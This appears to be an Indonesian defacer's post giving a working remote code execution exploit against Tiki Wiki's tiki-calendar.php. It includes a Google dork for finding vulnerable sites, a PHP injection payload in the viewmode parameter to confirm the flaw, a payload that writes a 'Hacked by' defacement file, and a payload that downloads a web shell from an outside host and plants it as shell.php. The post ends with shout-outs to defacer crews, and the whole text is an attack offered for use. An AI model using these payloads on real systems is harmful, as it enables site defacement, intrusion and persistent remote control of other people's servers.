Google Dork: inurl:tiki-calendar.php
yg vuln Version: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15)(if not patched)
#validate vulnerability
site.com/path/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a=' waw vuln :v
#Make a file
site.com/path/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22Hacked by Unnamed48%22));fclose($z);$a=%27
file created on site.com/path/index6.php
#upload php shell
site.com/path/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://www.heron-photography.co.uk/shell.txt%22%29%29;fclose%28$z%29;%27
your shell site.com/path/shell.php
---
Kurang paham? Lihat vidio
thx to my team res7ock crew | thx to all indonesian defacer | thx to my oshi shani :*
bye bye
exploit on video here
0 Comments